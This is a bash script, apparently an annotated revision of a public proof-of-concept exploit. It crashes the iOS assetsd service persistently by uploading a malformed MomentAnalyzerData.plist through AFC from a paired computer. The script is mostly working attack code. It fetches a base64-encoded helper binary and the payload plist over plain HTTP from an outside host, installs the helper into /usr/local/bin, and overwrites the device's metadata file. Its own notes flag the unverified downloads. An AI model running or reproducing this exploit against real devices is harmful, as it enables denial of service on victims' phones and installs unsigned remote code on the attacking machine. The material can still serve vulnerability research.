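#!/usr/bin/env bash
### assetsd iOS 12.1 type confusion vulnerability / persistent DoS
### Created by Sem Voigtländer on 09/25/2018.
### Licensed under the MIT License
### This is a 0day at this time
### DESCRIPTION
###
### Assetsd, MediaAnalyzer, MobileSlideshow all use metadata information.
### This metadata is stored in property lists in /var/mobile/Media, which is a path accessible through the AFC protocol over USB.
### An attacker can thus modify this file and re-upload it to the victim's device, but a requirement is to have a paired device.
### Unlike the iBooks vulnerability this vulnerability does not require user interaction.
### It is perfectly exploitable for race conditions as the assetsd service is restarted automatically upon crash and the bug will occur again.
### I modified the type of the location key-values in the MomentAnalyzerData property list, but this is certainly not the only way to exploit it.
###
### USAGE
###   assetsd_09_2018.sh        back up the device's MomentAnalyzerData.plist, then upload the malformed one
###   assetsd_09_2018.sh fix    remove the malformed plist and put the backup back if one exists
###
### ENVIRONMENT
###   ASSETSD_WORKDIR   working directory (default /tmp/assetsd_09_2018; "fix" looks for the backup here)
###   ASSETSD_FORCE=1   continue even when the backup of the device file fails
###
### SECURITY NOTES (review)
###   - The afcclient helper and the payload are both fetched over plain HTTP with no signature or
###     checksum, and the helper is then installed into /usr/local/bin. Anyone on the network path can
###     substitute either file; pin a hash or vendor the files before running this on a machine you care about.
###   - The working directory is a fixed, predictable path under /tmp (kept so that "fix" can find the
###     backup); the script refuses to use it if it is a symlink or owned by another user, because an
###     executable is staged there before being moved into /usr/local/bin.

set -u

readonly BASE_URL="http://exploitation.cool/plataoplomo/exploits/data"
readonly WORKDIR="${ASSETSD_WORKDIR:-/tmp/assetsd_09_2018}"
readonly METADATA_DIR="PhotoData"
readonly VULNERABLE_FILE="MISC/MomentAnalyzerData.plist"
readonly DEVICE_PATH="$METADATA_DIR/$VULNERABLE_FILE"
readonly PAYLOAD_FILE="MomentAnalyzerData.plist"
readonly BACKUP_FILE="Backup.dat"

#######################################
# Print a message to stderr and abort. Every network or destructive step below is routed
# through this so a failed download or backup cannot silently fall through to the device writes.
# Arguments: message words
#######################################
die() {
  printf 'error: %s\n' "$*" >&2
  exit 1
}

#######################################
# Ensure an afcclient binary is on PATH; if not, download the base64-encoded helper,
# decode it and install it into /usr/local/bin (normally requires write access there).
# NOTE(review): plain HTTP with no integrity check — see SECURITY NOTES above.
# Globals:  BASE_URL, WORKDIR
# Returns:  0 when afcclient is usable, exits via die otherwise
#######################################
ensure_afcclient() {
  if command -v afcclient >/dev/null 2>&1; then
    return 0
  fi
  echo "Downloading requirements..."
  local encoded="$WORKDIR/afcclient.bin"
  local decoded="$WORKDIR/afcclient"
  # -f makes an HTTP error page a failure instead of a "binary" made of HTML.
  curl -fsS "$BASE_URL/afcclient_linux.bin" -o "$encoded" || die "download of afcclient failed"
  # --decode is accepted by both GNU coreutils and macOS base64; the original used the
  # macOS-only -D/-i/-o spelling even though the download is named *_linux*.
  base64 --decode < "$encoded" > "$decoded" || die "base64 decode of afcclient failed"
  rm -f -- "$encoded"
  chmod +x -- "$decoded"
  mv -- "$decoded" /usr/local/bin/afcclient || die "could not install afcclient into /usr/local/bin"
  command -v afcclient >/dev/null 2>&1 || die "afcclient installed but /usr/local/bin is not on PATH"
}

#######################################
# Entry point: banner, workspace setup, then either the "fix" path or backup + upload.
# Arguments: $1 - optional "fix"
#######################################
main() {
  clear
  echo "==== Assetsd Type Confusion - iOS <= 12.1 ===="
  echo "= Created by: Sem Voigtlander ===="
  echo "=============================================="
  echo " "
  echo "Please connect your iPhone and wait a few..."
  sleep 10

  echo "Creating exploit tmp directory..."
  mkdir -p -- "$WORKDIR" || die "cannot create $WORKDIR"
  # Predictable /tmp path: refuse a directory somebody else planted there, since an executable
  # is staged in it and then moved into /usr/local/bin.
  if [[ -L "$WORKDIR" || ! -d "$WORKDIR" || ! -O "$WORKDIR" ]]; then
    die "$WORKDIR is a symlink or not owned by you; remove it or set ASSETSD_WORKDIR"
  fi

  ensure_afcclient

  echo "Setting up exploit workspace"
  cd -- "$WORKDIR" || die "cannot cd to $WORKDIR"

  if [[ "${1:-}" == "fix" ]]; then
    afcclient rm "$DEVICE_PATH"
    # Put the original metadata back when a previous run saved it. Without a (non-empty)
    # backup the pre-exploit file is simply gone, which is what "fix" always did.
    if [[ -s "$BACKUP_FILE" ]]; then
      afcclient put "$BACKUP_FILE" "$DEVICE_PATH" || die "restore of $BACKUP_FILE failed"
      echo "Restored original $DEVICE_PATH from $BACKUP_FILE"
    fi
    exit 0
  fi

  echo "Creating payload..."
  # Written straight to disk: routing it through $(...) and `echo -e` strips trailing newlines
  # and rewrites backslash escapes, i.e. it can corrupt the plist before it is uploaded.
  curl -fsS "$BASE_URL/MomentAnalyzerData.plist" -o "$PAYLOAD_FILE" || die "download of payload failed"

  echo "Backing up..."
  # Take the backup only once: a second run would otherwise overwrite the real file with the
  # malformed one uploaded by the first run, and "fix" would then restore the crash.
  if [[ -s "$BACKUP_FILE" ]]; then
    echo "Keeping existing $BACKUP_FILE"
  elif ! afcclient get "$DEVICE_PATH" "$BACKUP_FILE"; then
    rm -f -- "$BACKUP_FILE"
    [[ "${ASSETSD_FORCE:-}" == "1" ]] || die "backup of $DEVICE_PATH failed; not touching the device (set ASSETSD_FORCE=1 to continue without one)"
    echo "Warning: continuing without a backup because ASSETSD_FORCE=1" >&2
  fi

  echo "Uploading exploit..."
  afcclient rm "$DEVICE_PATH"
  afcclient put "$PAYLOAD_FILE" "$DEVICE_PATH" || die "upload of $PAYLOAD_FILE failed"
  rm -f -- "$PAYLOAD_FILE"

  if command -v idevicesyslog >/dev/null 2>&1; then
    echo -e "We will start the systemlog now, the bug should appear there as a crash including registers, but this may take some time!\n"
    idevicesyslog | grep "/System/Library/Frameworks/AssetsLibrary.framework/Support/assetsd" -A 185
    echo "You can restart your device and run idevicesyslog to verify it is persistant, or take a look at the Settings>Privacy>Analytics on the device"
    echo "To fix assetsd simply run this with the following argument: fix"
  else
    echo "Done. You can verify the occasion of the bug in Settings>Privacy>Analytics on the device (look for assetsd)"
  fi
}

main "$@"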